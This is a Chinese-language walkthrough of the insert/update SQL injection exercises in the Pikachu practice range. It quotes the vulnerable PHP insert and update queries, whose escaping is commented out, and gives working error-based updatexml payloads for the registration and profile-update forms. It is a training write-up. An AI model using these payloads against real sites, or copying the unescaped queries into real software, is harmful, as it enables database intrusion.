pikachu靶场-Sql Inject(SQL注入)-insert update注入 – 作者:知非知非知非

1626827145_60f769895128aeb656a4d.png!small

看看以前的账户是否能登录!!!!

1626827152_60f76990494e7f9b7548b.png!small

1626827196_60f769bc54cb317190007.png!small

我的思路是这样的!你看题目insert和update注入

插入注入:对应注册操作!!!

修改注入:对应修改个人信息操作!!!

1626827203_60f769c30e2434e38ed9a.png!small

简单粗暴!!!

下面我们来看源代码!!

首先,看注册操作的源代码!!

1626827211_60f769cb8a1eb70ffb67c.png!small

小知识:

//      $getdata=escape($link, $_POST);//转义  用于过滤特殊字符,防止注入

$query=”insert into member(username,pw,sex,phonenum,email,address) values(‘{$getdata[‘username’]}’,md5(‘{$getdata[‘password’]}’),'{$getdata[‘sex’]}’,'{$getdata[‘phonenum’]}’,'{$getdata[’email’]}’,'{$getdata[‘add’]}’)”;

操作语句如上:

实际的数据库操作语句为:

insert into member(username,pw,sex,phonenum,email,address) values(‘yaoming’,’123456′,’1′,’13112345678′,’[email protected]’)

此时,需要实现闭合!!!

必选项:

用户名:yaoming’ or updatexml(1,concat(0x7e,database()),0) or’

密码:123456

1626827236_60f769e45078bc60fcc32.png!small

小知识:报错注入:extractvalue、updatexml报错原理

https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html

接着,看修改操作的源代码!!

1626827243_60f769eb62d875ea080ad.png!small

1626827249_60f769f1c5dcbeb76c155.png!small

源代码语句为:

$query=”update member set sex='{$getdata[‘sex’]}’,phonenum='{$getdata[‘phonenum’]}’,address='{$getdata[‘add’]}’,email='{$getdata[’email’]}’ where username='{$_SESSION[‘sqli’][‘username’]}'”;

实际的数据库操作语句为:

update member set sex=’1′,phonenum=’13112345678′,address=’hell’,email=’[email protected]’ where username=XXXXXXXX

PAYLOAD 如下:

boy’ or updatexml(1,concat(0x7e,database()),0) or’

已弹出!!!!

1626827258_60f769fa43d9291671019.png!small

来源:freebuf.com 2021-07-21 08:30:43 by: 知非知非知非

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论